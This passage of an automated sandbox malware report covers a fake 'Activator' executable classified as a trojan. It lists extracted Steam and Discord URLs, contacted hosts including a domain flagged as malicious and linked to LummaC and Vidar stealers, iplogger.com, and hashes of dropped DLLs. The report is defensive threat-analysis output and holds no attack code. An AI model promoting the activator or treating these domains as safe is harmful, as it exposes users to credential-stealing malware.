                                                                                                                                                          http://www.garmin.com/xmlschemas/TrainingCenterDatabase/v2n3.exe, 00000002.00000002.2284662032.0000000002502000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&amp;l=englishBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                            unknown
                                                                                                                                                            http://www.opengis.net/gml/3.3/exrn3.exe, 00000002.00000002.2284662032.0000000002490000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.pngBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                              unknown
                                                                                                                                                              https://discord.com/api/v9/guilds/https://discord.com/api/v9/channels/https://discord.com/api/v9/usen3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                https://discord.com/api/v9//sticker-packsn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&amp;l=englisBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhCBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://store.steampowered.com/about/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                    unknown
                                                                                                                                                                    https://discord.com/api/v9/oauth2/applicationsn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://html4/loose.dtdDWrite.dllfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&amp;l=englishBitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://help.steampowered.com/en/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://steamcommunity.com/market/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            https://store.steampowered.com/news/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            unknown
                                                                                                                                                                            https://discord.com/api/v9/gatewayn3.exe, 00000002.00000002.2285591123.0000000002868000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • URL Reputation: safe
                                                                                                                                                                              unknown
                                                                                                                                                                              https://manage.windowsazure.com/https://vault.usgovcloudapi.net/mysql.database.usgovcloudapi.nethttpn3.exefalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2311833128.0000000002B1F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  http://.cssDWrite.dllfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1BitLockerToGo.exe, 00000003.00000002.2311588776.0000000002AFC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308783987.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2308878009.0000000002AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    • URL Reputation: safe
                                                                                                                                                                                    unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.42.210 | advocachark.store | United States | 13335 | CLOUDFLARENETUS | true
104.18.94.41 | challenges.cloudflare.com | United States | 13335 | CLOUDFLARENETUS | false
104.18.95.41 | unknown | United States | 13335 | CLOUDFLARENETUS | false
239.255.255.250 | unknown | Reserved | unknown | unknown | false
104.102.49.254 | steamcommunity.com | United States | 16625 | AKAMAI-ASUS | false
142.250.186.164 | www.google.com | United States | 15169 | GOOGLEUS | false
35.190.80.1 | a.nel.cloudflare.com | United States | 15169 | GOOGLEUS | false
172.67.188.178 | iplogger.com | United States | 13335 | CLOUDFLARENETUS | false
104.21.76.57 | unknown | United States | 13335 | CLOUDFLARENETUS | false
                                                                                                                                                                                    IP
                                                                                                                                                                                    192.168.2.6
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1525047
Start date and time: 2024-10-03 16:08:10 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 7m 27s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 11
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: Activator by URKE v2.5.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@22/30@27/10
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 66.7%
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 98%
                                                                                                                                                                                    • Number of executed functions: 67
                                                                                                                                                                                    • Number of non-executed functions: 132
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .exe
                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 142.250.186.67, 74.125.133.84, 142.250.186.110, 34.104.35.123, 142.250.74.195, 142.250.186.174
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                    • Execution Graph export aborted for target n3.exe, PID 340 because there are no executed function
                                                                                                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                    • VT rate limit hit for: Activator by URKE v2.5.exe
Time | Type | Description
10:09:16 | API Interceptor | 2x Sleep call for process: BitLockerToGo.exe modified
10:09:18 | API Interceptor | 1x Sleep call for process: Activator by URKE v2.5.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
advocachark.store | file.exe | malicious | LummaC, Vidar | 172.67.166.76
                                                                                                                                                                                                                                                https://fr089029.page.link/jdF1Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                • 104.18.95.41
                                                                                                                                                                                                                                                steamcommunity.comfile.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                RD4ttmm3bO.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                v4yke52Xwu.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                pkUVF88MvI.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                pl4VFaWQr8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                5STdfnsEu5.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                • 104.102.49.254
                                                                                                                                                                                                                                                iplogger.comSecuriteInfo.com.Trojan.DownLoaderNET.786.13278.22147.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 104.21.76.57
                                                                                                                                                                                                                                                file.exeGet hashmaliciousDarkTortilla, PureLog StealerBrowse
                                                                                                                                                                                                                                                • 104.21.76.57
                                                                                                                                                                                                                                                file.exeGet hashmaliciousDarkTortillaBrowse
                                                                                                                                                                                                                                                • 104.21.76.57
                                                                                                                                                                                                                                                Setup3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 104.21.76.57
                                                                                                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 104.21.76.57
                                                                                                                                                                                                                                                SecuriteInfo.com.W32.MSIL_Kryptik.EQI.gen.Eldorado.19106.7830.exeGet hashmaliciousDarkTortillaBrowse
                                                                                                                                                                                                                                                • 172.67.188.178
                                                                                                                                                                                                                                                file.exeGet hashmaliciousDarkTortillaBrowse
                                                                                                                                                                                                                                                • 172.67.188.178
                                                                                                                                                                                                                                                yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                                                                                                                                                                                                                                                • 172.67.188.178
                                                                                                                                                                                                                                                Arc453466701.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 104.21.76.57
                                                                                                                                                                                                                                                Arc453466701.msiGet hashmaliciousMetamorfoBrowse
                                                                                                                                                                                                                                                • 104.21.76.57
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
                                                                                                                                                                                                                                                Capelleaandenijssel.nl_reff_9918205228_HelNc2Zf7n.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                • 104.21.20.160
                                                                                                                                                                                                                                                https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                                                                file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                                                                                                                                                • 172.67.166.76
                                                                                                                                                                                                                                                file.exeGet hashmaliciousRDPWrap ToolBrowse
                                                                                                                                                                                                                                                • 188.114.97.3
                                                                                                                                                                                                                                                LVcCI.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                                                                                                                • 1.1.1.1
                                                                                                                                                                                                                                                http://Warehousingpro.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                • 1.1.1.1
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
No context
Process: C:\Users\user\Desktop\Activator by URKE v2.5.exe
File Type: PE32+ executable (DLL) (console) x86-64, for MS Windows
Category: dropped
Size (bytes): 3082752
Entropy (8bit): 6.289205228325881
Encrypted: false
SSDEEP: 49152:gjgXnISbRd4ZKg30wRR1cqt/BYMlYhZn/ZjFq5Jcs:4OnWFPpEZnQ
MD5: BE04078EC0F0023589D5DC2E59A955AC
SHA1: 2D882695E77E9F88338CCA6C4D5A98D685A6348A
SHA-256: 81D6A0A35BF5FD568307C1ADD9F1B650D828CAFB27589C05A4A8DC79A60691EA
SHA-512: E4E6BF19F541969C880A5F3D9CB5C03D88E7B9EC178E557E1A74DC05C08D6F36B5E87588E5DF6B0FCCB325CE2F71EA76B1D3DD80217BA68E44788AD9BDEED788
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Reputation: low
Process: C:\Users\user\Desktop\Activator by URKE v2.5.exe
File Type: PE32+ executable (DLL) (console) x86-64 (stripped to external PDB), for MS Windows
Category: dropped
Size (bytes): 492456
Entropy (8bit): 6.1400508690961475
Encrypted: false
SSDEEP: 6144:6bL80w8/HGgkXcl9hKJBSPxXq3d8VL0LMMMoBvmyHhUOrhSALIDlWJDl2aQaesZJ:6s0w1gksl9hoA0ZBvmmlsiZkr8D5G6
MD5: 911F56C73F449CBBC8D479878A68B05B
SHA1: 14895336D3C4130B7DCFB9EE97C13AC644C3ED1D
SHA-256: 119A157687E4CF1D1DEEBB90AEEA139EC84ECB9E131AED0A2EAC0217E03A04A0
SHA-512: 4D12267F812E00261854B62DE0EB7C62E0C48409A0ADACF593B1BF1E2DB5CAB3B06FE0CF49CAD972B71FB7AEBAC49C30A5436377B64CB2F405E7C57951FC1253
Malicious: false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1567744
                                                                                                                                                                                                                                                Entropy (8bit):6.0650207319632745
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:YdRSafyzmQtD+0SRBnkhaNUTXzp0a6dlRdN47cCX51UADMDQZ+8s28DFg:Yd8u1QtZSRW0qF0auRde7qOMDEds2gg
                                                                                                                                                                                                                                                MD5:E4934EDE49B2981028E23F28CA686220
                                                                                                                                                                                                                                                SHA1:8C226D27F5B86C6A8F744A1E0EB1A0EB22F2D2F3
                                                                                                                                                                                                                                                SHA-256:F56010CFBF0D36B2D7A025D2E37D769FBF802A1A54E34226B7BC79C6557F2228
                                                                                                                                                                                                                                                SHA-512:EC768EA2BA56235D4C829F0158C8365E7C9ED8AB40F5EFD99B43EEAA5B5F4039F51AF000EB6C54EC3AD57F8EDF09750B310E5885042CB99BC3D499186CAE4728
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):657408
                                                                                                                                                                                                                                                Entropy (8bit):6.265953684921677
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:RcLvCF/lE/Pg37lOfaxkHThE2BBPrgjriz+moV:RcTCF/lE/EpVsBBPrgjrW+mc
                                                                                                                                                                                                                                                MD5:ABB1D7692C63FB5EA98C1D62901EAB3B
                                                                                                                                                                                                                                                SHA1:EDE7655B3D9402D4CA315EDC4D21524EFE0D84F1
                                                                                                                                                                                                                                                SHA-256:3EF0DECE2C554215134E1988DA8FB95BE633371534812763E3CA02755C79CC7C
                                                                                                                                                                                                                                                SHA-512:C5349CE7DA5F7B55C2495A542465BC57279F90E9A4AD024C8FF1CD404F6186D2FE60CB43DF9ABA2C224376F7400483A929C66DC990EE8D8FA4302B7753C9CB85
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1213768
                                                                                                                                                                                                                                                Entropy (8bit):6.359171541973069
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:TEvk+/ygtYgwpQaIVQ3xASi0p83VWEbZx5mvxm:gvkcUAi3xLC3Vr/5mvxm
                                                                                                                                                                                                                                                MD5:9AC6550A08088F7F5AF9321FF6C68728
                                                                                                                                                                                                                                                SHA1:6EA05756E76DD7E54094081E00A6889659FCEF72
                                                                                                                                                                                                                                                SHA-256:8BF3F19C650FD099CED07F11F1F2EFB1219978C21CFEF854B2FA781C55A94910
                                                                                                                                                                                                                                                SHA-512:0F6C62D8F533C40703A095CA60BFD22FA8B5EA4D63D12E41B598B9AFDA29A8A45919D4955477C07BE53FF582E16CFDBE89A278E31BB00A8668A91BF386C08BB7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2429440
                                                                                                                                                                                                                                                Entropy (8bit):5.346983681448608
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:R3q/emkzV8npDpoop09D9qUzkbQKpoupuptpyQpo:R3cHkzV8npDpoop09D9qUzkbQKpoupuY
                                                                                                                                                                                                                                                MD5:DFAD79482827257858600114C0289438
                                                                                                                                                                                                                                                SHA1:9B09BE9CC7435A311A21DBF50D3CA8CBB530F049
                                                                                                                                                                                                                                                SHA-256:5DD22C6749751E63705C52236391991C2FE5349133828442488DE5F81758B464
                                                                                                                                                                                                                                                SHA-512:703735325EB0DEF155536E6381EB34E5E4B5BA6EB43BFABE76E00ACDD440AB0DC5B6AFD2362F810695EC8C5D7F7A011F052602898D0847A235937A3489F557C5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1096704
                                                                                                                                                                                                                                                Entropy (8bit):5.808109969358047
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:R6o/6L4jJBv5kFwk88vKjtowGycSIOnrBNK/bEiktXrT5IWz8Y8BJATHz:168jJBv5awp8vcFmOnrBNTiktxIFsHz
                                                                                                                                                                                                                                                MD5:AF97B3E6441701257C997AFEAF6652F1
                                                                                                                                                                                                                                                SHA1:FC2843DF3E57CC6675BF90C8284B2C5640EA156B
                                                                                                                                                                                                                                                SHA-256:AD7F4AD7934F1CBF834FC1DA418FFA6F635BD47F53FD59B5ED5912AE403C1D93
                                                                                                                                                                                                                                                SHA-512:8303856711439418B81D1946D4B70466D25F0EA8156DBB81968241C6FE5A4568EE9EAEBA19E0DB9E33930D9C75F9218F75B034B48F12F1674A6492BA5279BDB4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):593920
                                                                                                                                                                                                                                                Entropy (8bit):6.74945841385883
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:77Exz9If3nU5930aSmqXUO2JkxRacEGEHU3NF5bU8d5SfKJ1xBFa3D2Au7qbUxco:77E4n230aIUtgkGE0F15sW/azNQ4ABd
                                                                                                                                                                                                                                                MD5:3A192B20C6E3F6EF09FE15102DA1CC01
                                                                                                                                                                                                                                                SHA1:F315B951926D8A1BDC89704D6B0EC434987A82BA
                                                                                                                                                                                                                                                SHA-256:4C753C863E3040829BD2AA78F8F000C82B8592ABA86B07103084D7AF08DB85AB
                                                                                                                                                                                                                                                SHA-512:CD872CF12253B3CB9A7ED6E731B8A7BBD4D994CF68DBA18639B94E76CA891574724E5C867391A9E4A1447D19BF94DE33B9319BC1876AEE00C415F10CE09DDADD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):775168
                                                                                                                                                                                                                                                Entropy (8bit):5.704956759518643
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:scxlFQOw6nRCggohFJJzeZA7aF5+sGm/IurttylAJ:HBw6RCHohzJyZKsGm/IuJIl
                                                                                                                                                                                                                                                MD5:B2FECFC27152B0F66CF5EF168777B277
                                                                                                                                                                                                                                                SHA1:A73D76EA1C3AAB04927B67B581534D0057A11ED3
                                                                                                                                                                                                                                                SHA-256:0B1A171EA7FDEE99823B799B15E92194AF59693988A40B078010AC373A2B35C8
                                                                                                                                                                                                                                                SHA-512:88ED839CD6E288E15F82FF2AC8D721DAE563AEE14081995E56482F7C344D0A43A6A77696E95C092B244BD3C6E6BC4C2EA861BE6FED6E87FA4A4B6BFC19B69471
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):686080
                                                                                                                                                                                                                                                Entropy (8bit):5.482726150891449
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:kak1FU7vxVkIiYAllhMsWlOzrMMMMMMMMMkMMMMMMMMMC33:TkmAlYsWlO/MMMMMMMMMkMMMMMMMMMG3
                                                                                                                                                                                                                                                MD5:5BCF50340567D5FE3403CCB896632473
                                                                                                                                                                                                                                                SHA1:40830DC9EC229C5C6F953C42CA2F6E0C364B415F
                                                                                                                                                                                                                                                SHA-256:B2853768322AF509C21CC575CF3A45601A6555439EAAD0DE59082EB451B5753A
                                                                                                                                                                                                                                                SHA-512:9EBB05713EF4A88B1869CD939F894BC1F81B1E1EAFFFFB1B35A57894B184FFC46D1F287EF09795AF1C4A6CBA060D73A5C38ECCAE44DC22F14D6DD25B65B54B95
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1761280
                                                                                                                                                                                                                                                Entropy (8bit):6.478420482223799
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:Xmxetxu5hr1PRGIgT60vZnistePozk21e5m8Ar/iMkR9:wJr1PpgBioegzk21e4j5e9
                                                                                                                                                                                                                                                MD5:F6C6C233D2A04EBD35DB2797E6110A15
                                                                                                                                                                                                                                                SHA1:378098B2214E091FD5C5541AB563D82FF12D5666
                                                                                                                                                                                                                                                SHA-256:95C058E3484A169A0C315941DA5E306635AFC2D49B3C91D8F565DDCAAAC7153B
                                                                                                                                                                                                                                                SHA-512:5812D68338CB16493DFA46348F8AE549E566F6FE3A21E42E9B9BCFE07D63349ECC42B7EF3147A451BE6A7733671646E6092C03A60E58E478A205D5A81E6C4886
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):581120
                                                                                                                                                                                                                                                Entropy (8bit):6.322357614878576
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:+8LM3srHOJ8d8mOQw3EJ19WaCxC6xHlwfg+xX52bKcA8rZfl6va0EQJuq5UGvN:zrHO2d9w3EJDT2lwg+1wb5ymQ53
                                                                                                                                                                                                                                                MD5:171D55444F35EB903900CFCE0E1BE83A
                                                                                                                                                                                                                                                SHA1:F5F2AE36D2E002B1119171FA84A0DD1341F91580
                                                                                                                                                                                                                                                SHA-256:48651EFFB6FF0090B513A84F21CA85689C412A68A8A6F8C0F2EA391B97BB28A2
                                                                                                                                                                                                                                                SHA-512:1427B5DFF77157A5544EC821EADC020499262CE6235BEF2E5D18D2966112AC354098578A0E0AAACE207E87EE1F37F737F03A658AE21EAF92813F48F24CA8C1CB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\Activator by URKE v2.5.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3488768
                                                                                                                                                                                                                                                Entropy (8bit):6.232543570904378
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:iue6zsrGiHXOmuBk7Qb0bTfXUgt6Ltj4zi/ZU9LE/h5H2S5Tr:iOsnAb6j+ZU9LEK
                                                                                                                                                                                                                                                MD5:FF3C52B9B006E76E972CDD398E2D0033
                                                                                                                                                                                                                                                SHA1:D5BA536CDC6C6E9E91B1437B20B646C3208D83EA
                                                                                                                                                                                                                                                SHA-256:03EF9CE62383077DBF3BFDA0A60FB573EBD8495CF0FFA649295DDA328B8C4071
